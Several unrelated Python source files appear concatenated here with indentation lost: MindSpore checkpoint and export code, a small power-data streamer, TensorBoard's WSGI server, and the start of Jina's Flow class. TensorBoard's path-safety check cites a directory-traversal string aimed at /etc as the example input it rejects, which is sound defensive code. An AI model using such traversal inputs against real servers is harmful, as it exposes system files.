param_list = []
for (key, value) in param_dict.items():
each_param = {"name": key}
if isinstance(value.data, Tensor):
param_data = value.data
else:
param_data = Tensor(value.data)
# in automatic model parallel scenario, some parameters were spliteds to all the devices,
# which should be combined before saving
if integrated_save and key in train_network.parameter_layout_dict:
param_data = _get_merged_param_data(train_network, key, param_data)
each_param["data"] = param_data
param_list.append(each_param)
save_checkpoint(param_list, ckpt_file_name, async_save)
def _get_merged_param_data(net, param_name, param_data):
"""
Gets the merged data(tensor) from tensor slice, by device arrangement and tensor map.
Args:
net (Cell): MindSpore network.
param_name(str): The parameter name, which to be combined.
param_data(Tensor):The parameter data on the local device,
It was a slice of the whole parameter data.
Returns:
Tensor, the combined tensor which with the whole data value.
"""
layout = []
layout = net.parameter_layout_dict[param_name]
if len(layout) < 2:
logger.info("layout dict does not contain the key %s", param_name)
return param_data
dev_mat = layout[0]
tensor_map = layout[1]
field_size = layout[3]
from mindspore.parallel._cell_wrapper import get_allgather_cell
from mindspore.parallel._tensor import _reshape_param_data, _reshape_param_data_with_weight
# while any dim is not equal to -1, means param is splited and needs to be merged
for dim in tensor_map:
if dim != -1:
allgather_net = get_allgather_cell()
param_data = allgather_net(param_data)
if field_size[0]:
return _reshape_param_data_with_weight(param_data, dev_mat, field_size)
return _reshape_param_data(param_data, dev_mat, tensor_map)
return param_data
def _fill_param_into_net(net, parameter_list):
"""
Fills parameter_list into net.
Args:
net (Cell): train network.
parameter_list (list): parameters list from ge callback.
"""
parameter_dict = {}
for each_param in parameter_list:
param_name = each_param["name"]
if isinstance(each_param["data"], Parameter):
each_param["data"].init_data()
np_val = each_param["data"].asnumpy()
if np_val.shape == (1,):
parameter_dict[param_name] = Parameter(np_val, name=param_name)
elif np_val.shape == ():
parameter_dict[param_name] = Parameter(Tensor(np_val.tolist(), mstype.pytype_to_dtype(np_val.dtype)),
name=param_name)
else:
parameter_dict[param_name] = Parameter(Tensor(np_val), name=param_name)
load_param_into_net(net, parameter_dict)
def export(net, *inputs, file_name, file_format='GEIR'):
"""
Exports MindSpore predict model to file in specified format.
Args:
net (Cell): MindSpore network.
inputs (Tensor): Inputs of the `net`.
file_name (str): File name of model to export.
file_format (str): MindSpore currently supports 'GEIR', 'ONNX' and 'BINARY' format for exported model.
- GEIR: Graph Engine Intermidiate Representation. An intermidiate representation format of
Ascend model.
- ONNX: Open Neural Network eXchange. An open format built to represent machine learning models.
- BINARY: Binary format for model. An intermidiate representation format for models.
"""
logger.info("exporting model file:%s format:%s.", file_name, file_format)
check_input_data(*inputs, data_class=Tensor)
supported_formats = ['GEIR', 'ONNX', 'BINARY']
if file_format not in supported_formats:
raise ValueError(f'Illegal file format {file_format}, it must be one of {supported_formats}')
# switch network mode to infer when it is training
is_training = net.training
if is_training:
net.set_train(mode=False)
# export model
net.init_parameters_data()
if file_format == 'GEIR':
phase_name = 'export.geir'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name)
_executor.export(file_name, graph_id)
elif file_format == 'ONNX': # file_format is 'ONNX'
# NOTICE: the pahse name `export_onnx` is used for judging whether is exporting onnx in the compile pipeline,
# do not change it to other values.
phase_name = 'export.onnx'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name, do_convert=False)
onnx_stream = _executor._get_func_graph_proto(graph_id)
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IWUSR | stat.S_IRUSR)
f.write(onnx_stream)
elif file_format == 'BINARY': # file_format is 'BINARY'
phase_name = 'export.binary'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name, do_convert=False)
onnx_stream = _executor._get_func_graph_proto(graph_id, 'binary_ir')
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IWUSR | stat.S_IRUSR)
f.write(onnx_stream)
# restore network training mode
if is_training:
net.set_train(mode=True)
def parse_print(print_file_name):
"""
Loads Print data from a specified file.
Args:
print_file_name (str): The file name of save print data.
Returns:
List, element of list is Tensor.
Raises:
ValueError: The print file may be empty, please make sure enter the correct file name.
"""
print_file_path = os.path.realpath(print_file_name)
if os.path.getsize(print_file_path) == 0:
raise ValueError("The print file may be empty, please make sure enter the correct file name.")
logger.info("Execute load print process.")
print_list = Print()
try:
with open(print_file_path, "rb") as f:
pb_content = f.read()
print_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the print file %s, please check the correct of the file.", print_file_name)
raise ValueError(e.__str__())
tensor_list = []
try:
for print_ in print_list.value:
# String type
if print_.HasField("desc"):
tensor_list.append(print_.desc)
elif print_.HasField("tensor"):
dims = print_.tensor.dims
data_type = print_.tensor.tensor_type
data = print_.tensor.tensor_content
np_type = tensor_to_np_type[data_type]
param_data = np.fromstring(data, np_type)
ms_type = tensor_to_ms_type[data_type]
param_dim = []
for dim in dims:
param_dim.append(dim)
if param_dim:
param_value = param_data.reshape(param_dim)
tensor_list.append(Tensor(param_value, ms_type))
# Scale type
else:
data_type_ = data_type.lower()
if 'float' in data_type_:
param_data = float(param_data[0])
elif 'int' in data_type_:
param_data = int(param_data[0])
elif 'bool' in data_type_:
param_data = bool(param_data[0])
tensor_list.append(Tensor(param_data, ms_type))
except BaseException as e:
logger.error("Failed to load the print file %s.", print_list)
raise RuntimeError(e.__str__())
return tensor_list
|
data_streamer.py
|
__author__ = "Your name"
__email__ = "Your email"
__version__ = "0.1"
import json
from datetime import datetime
from threading import Thread
import time
import subprocess
import requests
class DataStreamer(object):
"""
Docstring here
"""
def __init__(self, message_queue):
"""
:param self:
"""
self.message_queue = message_queue
self.running = True
self.thread = Thread(target=self._start_data_poll).start()
pass
def _start_data_poll(self):
"""
:return:
"""
url = "http://db.sead.systems:8080/466419818?limit=61&device=Panel3&type=P"
prev_time = int(time.time())
while True:
"""
response = requests.get(url)
json_data = json.loads(response.text)
for i in range(2,61):
previous_data_point = json_data[i-1]
current_data_point = json_data[i]
delta = (float(current_data_point[1]) - float(previous_data_point[1])) / (3600.0 * 1.0);
datetime_object = datetime.strptime(current_data_point[0], '%Y-%m-%d %H:%M:%S')
self.message_queue.put((delta, datetime_object))
sleep(60)
# for i in range(5):
# self.message_queue.put((time(), "{}kWh".format(randint(0, 5000)/1000.0)))
"""
cur_time = int(time.time())
if cur_time == prev_time:
continue
prev_time = cur_time
cur_time_str = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(cur_time))
datetime_object = datetime.strptime(cur_time_str, '%Y-%m-%d %H:%M:%S')
delta = 510.0*0.01*float(subprocess.check_output(["apcaccess"]).decode().split("\n")[12].split(":")[1].strip().split(" ")[0])
self.message_queue.put((delta, datetime_object))
time.sleep(1)
def finish(self):
print("Done")
self.running = False
self.thread.join()
|
application.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorBoard WSGI Application Logic.
TensorBoardApplication constructs TensorBoard as a WSGI application.
It handles serving static assets, and implements TensorBoard data APIs.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import imghdr
import mimetypes
import os
import re
import threading
import time
import six
from six.moves import urllib
from six.moves.urllib import parse as urlparse
from werkzeug import wrappers
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import tf_logging as logging
from tensorflow.tensorboard.backend import process_graph
from tensorflow.tensorboard.backend.event_processing import event_accumulator
from tensorflow.tensorboard.backend.event_processing import event_multiplexer
from tensorflow.tensorboard.lib.python import http_util
from tensorflow.tensorboard.plugins.debugger import debugger_plugin
from tensorflow.tensorboard.plugins.projector import projector_plugin
DEFAULT_SIZE_GUIDANCE = {
event_accumulator.COMPRESSED_HISTOGRAMS: 500,
event_accumulator.IMAGES: 10,
event_accumulator.AUDIO: 10,
event_accumulator.SCALARS: 1000,
event_accumulator.HEALTH_PILLS: 100,
event_accumulator.HISTOGRAMS: 50,
}
DATA_PREFIX = '/data'
LOGDIR_ROUTE = '/logdir'
RUNS_ROUTE = '/runs'
PLUGIN_PREFIX = '/plugin'
SCALARS_ROUTE = '/' + event_accumulator.SCALARS
IMAGES_ROUTE = '/' + event_accumulator.IMAGES
AUDIO_ROUTE = '/' + event_accumulator.AUDIO
HISTOGRAMS_ROUTE = '/' + event_accumulator.HISTOGRAMS
COMPRESSED_HISTOGRAMS_ROUTE = '/' + event_accumulator.COMPRESSED_HISTOGRAMS
INDIVIDUAL_IMAGE_ROUTE = '/individualImage'
INDIVIDUAL_AUDIO_ROUTE = '/individualAudio'
GRAPH_ROUTE = '/' + event_accumulator.GRAPH
RUN_METADATA_ROUTE = '/' + event_accumulator.RUN_METADATA
TAB_ROUTES = ['', '/events', '/images', '/audio', '/graphs', '/histograms']
_IMGHDR_TO_MIMETYPE = {
'bmp': 'image/bmp',
'gif': 'image/gif',
'jpeg': 'image/jpeg',
'png': 'image/png'
}
_DEFAULT_IMAGE_MIMETYPE = 'application/octet-stream'
def _content_type_for_image(encoded_image_string):
image_type = imghdr.what(None, encoded_image_string)
return _IMGHDR_TO_MIMETYPE.get(image_type, _DEFAULT_IMAGE_MIMETYPE)
class _OutputFormat(object):
"""An enum used to list the valid output formats for API calls.
Not all API calls support all formats (for example, only scalars and
compressed histograms support CSV).
"""
JSON = 'json'
def standard_tensorboard_wsgi(logdir, purge_orphaned_data, reload_interval):
"""Construct a TensorBoardWSGIApp with standard plugins and multiplexer."""
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=DEFAULT_SIZE_GUIDANCE,
purge_orphaned_data=purge_orphaned_data)
plugins = {
debugger_plugin.PLUGIN_PREFIX_ROUTE:
debugger_plugin.DebuggerPlugin(multiplexer),
projector_plugin.PLUGIN_PREFIX_ROUTE:
projector_plugin.ProjectorPlugin(),
}
return TensorBoardWSGIApp(logdir, plugins, multiplexer, reload_interval)
class TensorBoardWSGIApp(object):
"""The TensorBoard application, conforming to WSGI spec."""
# How many samples to include in sampling API calls by default.
DEFAULT_SAMPLE_COUNT = 10
# NOTE TO MAINTAINERS: An accurate Content-Length MUST be specified on all
# responses using send_header.
protocol_version = 'HTTP/1.1'
def __init__(self, logdir, plugins, multiplexer, reload_interval):
"""Constructs the TensorBoard application.
Args:
logdir: the logdir spec that describes where data will be loaded.
may be a directory, or comma,separated list of directories, or colons
can be used to provide named directories
plugins: Map from plugin name to plugin application
multiplexer: The EventMultiplexer with TensorBoard data to serve
reload_interval: How often (in seconds) to reload the Multiplexer
Returns:
A WSGI application that implements the TensorBoard backend.
"""
self._logdir = logdir
self._plugins = plugins
self._multiplexer = multiplexer
self.tag = get_tensorboard_tag()
path_to_run = parse_event_files_spec(self._logdir)
if reload_interval:
start_reloading_multiplexer(self._multiplexer, path_to_run,
reload_interval)
else:
reload_multiplexer(self._multiplexer, path_to_run)
self.data_applications = {
DATA_PREFIX + LOGDIR_ROUTE:
self._serve_logdir,
DATA_PREFIX + SCALARS_ROUTE:
self._serve_scalars,
DATA_PREFIX + GRAPH_ROUTE:
self._serve_graph,
DATA_PREFIX + RUN_METADATA_ROUTE:
self._serve_run_metadata,
DATA_PREFIX + HISTOGRAMS_ROUTE:
self._serve_histograms,
DATA_PREFIX + COMPRESSED_HISTOGRAMS_ROUTE:
self._serve_compressed_histograms,
DATA_PREFIX + IMAGES_ROUTE:
self._serve_images,
DATA_PREFIX + INDIVIDUAL_IMAGE_ROUTE:
self._serve_image,
DATA_PREFIX + AUDIO_ROUTE:
self._serve_audio,
DATA_PREFIX + INDIVIDUAL_AUDIO_ROUTE:
self._serve_individual_audio,
DATA_PREFIX + RUNS_ROUTE:
self._serve_runs,
'/app.js':
self._serve_js
}
# Serve the routes from the registered plugins using their name as the route
# prefix. For example if plugin z has two routes /a and /b, they will be
# served as /data/plugin/z/a and /data/plugin/z/b.
for name in self._plugins:
try:
plugin = self._plugins[name]
plugin_apps = plugin.get_plugin_apps(self._multiplexer.RunPaths(),
self._logdir)
except Exception as e: # pylint: disable=broad-except
logging.warning('Plugin %s failed. Exception: %s', name, str(e))
continue
for route, app in plugin_apps.items():
path = DATA_PREFIX + PLUGIN_PREFIX + '/' + name + route
self.data_applications[path] = app
# We use underscore_names for consistency with inherited methods.
def _image_response_for_run(self, run_images, run, tag):
"""Builds a JSON-serializable object with information about run_images.
Args:
run_images: A list of event_accumulator.ImageValueEvent objects.
run: The name of the run.
tag: The name of the tag the images all belong to.
Returns:
A list of dictionaries containing the wall time, step, URL, width, and
height for each image.
"""
response = []
for index, run_image in enumerate(run_images):
response.append({
'wall_time': run_image.wall_time,
'step': run_image.step,
# We include the size so that the frontend can add that to the <img>
# tag so that the page layout doesn't change when the image loads.
'width': run_image.width,
'height': run_image.height,
'query': self._query_for_individual_image(run, tag, index)
})
return response
def _audio_response_for_run(self, run_audio, run, tag):
"""Builds a JSON-serializable object with information about run_audio.
Args:
run_audio: A list of event_accumulator.AudioValueEvent objects.
run: The name of the run.
tag: The name of the tag the images all belong to.
Returns:
A list of dictionaries containing the wall time, step, URL, and
content_type for each audio clip.
"""
response = []
for index, run_audio_clip in enumerate(run_audio):
response.append({
'wall_time': run_audio_clip.wall_time,
'step': run_audio_clip.step,
'content_type': run_audio_clip.content_type,
'query': self._query_for_individual_audio(run, tag, index)
})
return response
def _path_is_safe(self, path):
"""Check path is safe (stays within current directory).
This is for preventing directory-traversal attacks.
Args:
path: The path to check for safety.
Returns:
True if the given path stays within the current directory, and false
if it would escape to a higher directory. E.g. _path_is_safe('index.html')
returns true, but _path_is_safe('../../../etc/password') returns false.
"""
base = os.path.abspath(os.curdir)
absolute_path = os.path.abspath(path)
prefix = os.path.commonprefix([base, absolute_path])
return prefix == base
@wrappers.Request.application
def _serve_logdir(self, request):
"""Respond with a JSON object containing this TensorBoard's logdir."""
return http_util.Respond(
request, {'logdir': self._logdir}, 'application/json')
@wrappers.Request.application
def _serve_scalars(self, request):
"""Given a tag and single run, return array of ScalarEvents."""
# TODO(cassandrax): return HTTP status code for malformed requests
tag = request.args.get('tag')
run = request.args.get('run')
values = self._multiplexer.Scalars(run, tag)
return http_util.Respond(request, values, 'application/json')
@wrappers.Request.application
def _serve_graph(self, request):
"""Given a single run, return the graph definition in json format."""
run = request.args.get('run', None)
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
try:
graph = self._multiplexer.Graph(run)
except ValueError:
return http_util.Respond(request, '404 Not Found', code=404)
limit_attr_size = request.args.get('limit_attr_size', None)
if limit_attr_size is not None:
try:
limit_attr_size = int(limit_attr_size)
except ValueError:
return http_util.Respond(
request, 'query parameter `limit_attr_size` must be integer',
'text/plain', 400)
large_attrs_key = request.args.get('large_attrs_key', None)
try:
process_graph.prepare_graph_for_ui(graph, limit_attr_size,
large_attrs_key)
except ValueError as e:
return http_util.Respond(request, e.message, 'text/plain', 400)
return http_util.Respond(request, str(graph), 'text/x-protobuf') # pbtxt
@wrappers.Request.application
def _serve_run_metadata(self, request):
"""Given a tag and a TensorFlow run, return the session.run() metadata."""
tag = request.args.get('tag', None)
run = request.args.get('run', None)
if tag is None:
return http_util.Respond(
request, 'query parameter "tag" is required', 'text/plain', 400)
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
try:
run_metadata = self._multiplexer.RunMetadata(run, tag)
except ValueError:
return http_util.Respond(request, '404 Not Found', code=404)
return http_util.Respond(
request, str(run_metadata), 'text/x-protobuf') # pbtxt
@wrappers.Request.application
def _serve_histograms(self, request):
"""Given a tag and single run, return an array of histogram values."""
tag = request.args.get('tag')
run = request.args.get('run')
values = self._multiplexer.Histograms(run, tag)
return http_util.Respond(request, values, 'application/json')
@wrappers.Request.application
def _serve_compressed_histograms(self, request):
"""Given a tag and single run, return an array of compressed histograms."""
tag = request.args.get('tag')
run = request.args.get('run')
compressed_histograms = self._multiplexer.CompressedHistograms(run, tag)
return http_util.Respond(request, compressed_histograms, 'application/json')
@wrappers.Request.application
def _serve_images(self, request):
"""Given a tag and list of runs, serve a list of images.
Note that the images themselves are not sent; instead, we respond with URLs
to the images. The frontend should treat these URLs as opaque and should not
try to parse information about them or generate them itself, as the format
may change.
Args:
request: A werkzeug.wrappers.Request object.
Returns:
A werkzeug.Response application.
"""
tag = request.args.get('tag')
run = request.args.get('run')
images = self._multiplexer.Images(run, tag)
response = self._image_response_for_run(images, run, tag)
return http_util.Respond(request, response, 'application/json')
@wrappers.Request.application
def _serve_image(self, request):
"""Serves an individual image."""
tag = request.args.get('tag')
run = request.args.get('run')
index = int(request.args.get('index'))
image = self._multiplexer.Images(run, tag)[index]
encoded_image_string = image.encoded_image_string
content_type = _content_type_for_image(encoded_image_string)
return http_util.Respond(request, encoded_image_string, content_type)
def _query_for_individual_image(self, run, tag, index):
"""Builds a URL for accessing the specified image.
This should be kept in sync with _serve_image. Note that the URL is *not*
guaranteed to always return the same image, since images may be unloaded
from the reservoir as new images come in.
Args:
run: The name of the run.
tag: The tag.
index: The index of the image. Negative values are OK.
Returns:
A string representation of a URL that will load the index-th
sampled image in the given run with the given tag.
"""
query_string = urllib.parse.urlencode({
'run': run,
'tag': tag,
'index': index
})
return query_string
@wrappers.Request.application
def _serve_audio(self, request):
"""Given a tag and list of runs, serve a list of audio.
Note that the audio clips themselves are not sent; instead, we respond with
URLs to the audio. The frontend should treat these URLs as opaque and should
not try to parse information about them or generate them itself, as the
format may change.
Args:
request: A werkzeug.wrappers.Request object.
Returns:
A werkzeug.Response application.
"""
tag = request.args.get('tag')
run = request.args.get('run')
audio_list = self._multiplexer.Audio(run, tag)
response = self._audio_response_for_run(audio_list, run, tag)
return http_util.Respond(request, response, 'application/json')
@wrappers.Request.application
def _serve_individual_audio(self, request):
"""Serves an individual audio clip."""
tag = request.args.get('tag')
run = request.args.get('run')
index = int(request.args.get('index'))
audio = self._multiplexer.Audio(run, tag)[index]
return http_util.Respond(
request, audio.encoded_audio_string, audio.content_type)
def _query_for_individual_audio(self, run, tag, index):
"""Builds a URL for accessing the specified audio.
This should be kept in sync with _serve_individual_audio. Note that the URL
is *not* guaranteed to always return the same audio, since audio may be
unloaded from the reservoir as new audio comes in.
Args:
run: The name of the run.
tag: The tag.
index: The index of the audio. Negative values are OK.
Returns:
A string representation of a URL that will load the index-th
sampled audio in the given run with the given tag.
"""
query_string = urllib.parse.urlencode({
'run': run,
'tag': tag,
'index': index
})
return query_string
@wrappers.Request.application
def _serve_runs(self, request):
"""WSGI app serving a JSON object about runs and tags.
Returns a mapping from runs to tagType to list of tags for that run.
Args:
request: A werkzeug request
Returns:
A werkzeug Response with the following content:
{runName: {images: [tag1, tag2, tag3],
audio: [tag4, tag5, tag6],
scalars: [tagA, tagB, tagC],
histograms: [tagX, tagY, tagZ],
firstEventTimestamp: 123456.789}}
"""
runs = self._multiplexer.Runs()
for run_name, run_data in runs.items():
try:
run_data['firstEventTimestamp'] = self._multiplexer.FirstEventTimestamp(
run_name)
except ValueError:
logging.warning('Unable to get first event timestamp for run %s',
run_name)
run_data['firstEventTimestamp'] = None
return http_util.Respond(request, runs, 'application/json')
@wrappers.Request.application
def _serve_index(self, request):
"""Serves the index page (i.e., the tensorboard app itself)."""
return self._serve_static_file(request, '/dist/index.html')
@wrappers.Request.application
def _serve_js(self, request):
"""Serves the JavaScript for the index page."""
return self._serve_static_file(request, '/dist/app.js')
def _serve_static_file(self, request, path):
"""Serves the static file located at the given path.
Args:
request: A werkzeug Request
path: The path of the static file, relative to the tensorboard/ directory.
Returns:
A werkzeug.Response application.
"""
# Strip off the leading forward slash.
orig_path = path.lstrip('/')
if not self._path_is_safe(orig_path):
logging.warning('path not safe: %s', orig_path)
return http_util.Respond(request, 'Naughty naughty!', 'text/plain', 400)
# Resource loader wants a path relative to //WORKSPACE/tensorflow.
path = os.path.join('tensorboard', orig_path)
# Open the file and read it.
try:
contents = resource_loader.load_resource(path)
except IOError:
# For compatibility with latest version of Bazel, we renamed bower
# packages to use '_' rather than '-' in their package name.
# This means that the directory structure is changed too.
# So that all our recursive imports work, we need to modify incoming
# requests to map onto the new directory structure.
path = orig_path
components = path.split('/')
components[0] = components[0].replace('-', '_')
path = ('/').join(components)
# Bazel keeps all the external dependencies in //WORKSPACE/external.
# and resource loader wants a path relative to //WORKSPACE/tensorflow/.
path = os.path.join('../external', path)
try:
contents = resource_loader.load_resource(path)
except IOError:
logging.warning('path %s not found, sending 404', path)
return http_util.Respond(request, 'Not found', 'text/plain', code=404)
mimetype, content_encoding = mimetypes.guess_type(path)
mimetype = mimetype or 'application/octet-stream'
return http_util.Respond(
request,
contents,
mimetype,
expires=3600,
content_encoding=content_encoding)
def __call__(self, environ, start_response): # pylint: disable=invalid-name
"""Central entry point for the TensorBoard application.
This method handles routing to sub-applications. It does simple routing
using regular expression matching.
This __call__ method conforms to the WSGI spec, so that instances of this
class are WSGI applications.
Args:
environ: See WSGI spec.
start_response: See WSGI spec.
Returns:
A werkzeug Response.
"""
request = wrappers.Request(environ)
parsed_url = urlparse.urlparse(request.path)
# Remove a trailing slash, if present.
clean_path = parsed_url.path
if clean_path.endswith('/'):
clean_path = clean_path[:-1]
# pylint: disable=too-many-function-args
if clean_path in self.data_applications:
return self.data_applications[clean_path](environ, start_response)
elif clean_path in TAB_ROUTES:
return self._serve_index(environ, start_response)
else:
return self._serve_static_file(request, clean_path)(environ,
start_response)
# pylint: enable=too-many-function-args
def parse_event_files_spec(logdir):
"""Parses `logdir` into a map from paths to run group names.
The events files flag format is a comma-separated list of path specifications.
A path specification either looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a
spec with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir is None:
return files
# Make sure keeping consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile('[a-zA-Z][0-9a-zA-Z.]*://.*')
for specification in logdir.split(','):
# Check if the spec contains group. A spec start with xyz:// is regarded as
# URI path spec instead of group spec. If the spec looks like /foo:bar/baz,
# then we assume it's a path with a colon.
if (uri_pattern.match(specification) is None and ':' in specification and
specification[0] != '/'):
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(path)
files[path] = run_name
return files
def reload_multiplexer(multiplexer, path_to_run):
"""Loads all runs into the multiplexer.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
"""
start = time.time()
logging.info('TensorBoard reload process beginning')
for (path, name) in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
logging.info('TensorBoard reload process: Reload the whole Multiplexer')
multiplexer.Reload()
duration = time.time() - start
logging.info('TensorBoard done reloading. Load took %0.3f secs', duration)
def start_reloading_multiplexer(multiplexer, path_to_run, load_interval):
"""Starts a thread to automatically reload the given multiplexer.
The thread will reload the multiplexer by calling `ReloadMultiplexer` every
`load_interval` seconds, starting immediately.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: How many seconds to wait after one load before starting the
next load.
Returns:
A started `threading.Thread` that reloads the multiplexer.
"""
# We don't call multiplexer.Reload() here because that would make
# AddRunsFromDirectory block until the runs have all loaded.
def _reload_forever():
while True:
reload_multiplexer(multiplexer, path_to_run)
time.sleep(load_interval)
thread = threading.Thread(target=_reload_forever)
thread.daemon = True
thread.start()
return thread
def get_tensorboard_tag():
"""Read the TensorBoard TAG number, and return it or an empty string."""
tag = resource_loader.load_resource('tensorboard/TAG').strip()
return tag
|
base.py
|
import argparse
import base64
import copy
import itertools
import json
import multiprocessing
import os
import re
import sys
import threading
import time
import uuid
import warnings
from collections import OrderedDict
from contextlib import ExitStack
from typing import (
TYPE_CHECKING,
Dict,
List,
Optional,
Set,
Tuple,
Type,
Union,
overload,
)
from jina import __default_host__, helper
from jina.clients import Client
from jina.clients.mixin import AsyncPostMixin, PostMixin
from jina.enums import (
DeploymentRoleType,
FlowBuildLevel,
FlowInspectType,
GatewayProtocolType,
)
from jina.excepts import (
FlowMissingDeploymentError,
FlowTopologyError,
RuntimeFailToStart,
)
from jina.helper import (
ArgNamespace,
CatchAllCleanupContextManager,
colored,
download_mermaid_url,
get_internal_ip,
get_public_ip,
typename,
docarray_graphql_compatible,
GRAPHQL_MIN_DOCARRAY_VERSION,
)
from jina.jaml import JAMLCompatible
from jina.logging.logger import JinaLogger
from jina.orchestrate.deployments import Deployment
from jina.orchestrate.flow.builder import _hanging_deployments, allowed_levels
from jina.parsers import (
set_client_cli_parser,
set_deployment_parser,
set_gateway_parser,
)
from jina.parsers.flow import set_flow_parser
__all__ = ['Flow']
class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
if TYPE_CHECKING:
from jina.clients.base import BaseClient
from jina.orchestrate.flow.asyncio import AsyncFlow
from jina.serve.executors import BaseExecutor
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_deployment_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors."""
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
https: Optional[bool] = False,
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
return_responses: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param https: If set, connect to gateway using https
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param return_responses: If set, return results as List of Requests instead of a reduced DocArray.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
connection_list: Optional[str] = None,
cors: Optional[bool] = False,
daemon: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
deployments_addresses: Optional[str] = '{}',
description: Optional[str] = None,
disable_reduce: Optional[bool] = False,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
graph_description: Optional[str] = '{}',
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
log_config: Optional[str] = None,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
no_graphql_endpoint: Optional[bool] = False,
polling: Optional[str] = 'ANY',
port: Optional[int] = None,
prefetch: Optional[int] = 0,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'GRPCGatewayRuntime',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after_address: Optional[str] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
uvicorn_kwargs: Optional[dict] = None,
workspace: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param connection_list: dictionary JSON with a list of connections to configure
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
:param daemon: The Pod attempts to terminate all of its Runtime child processes/threads on existing. setting it to true basically tell the Pod do not wait on the Runtime when closing
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param deployments_addresses: dictionary JSON with the input addresses of each Deployment
:param description: The description of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param disable_reduce: Disable the built-in reduce mechanism, set this if the reduction is to be handled by the Executor connected to this Head
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
:param graph_description: Routing graph for the gateway
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside WorkerRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bind with those values will receive data requests.
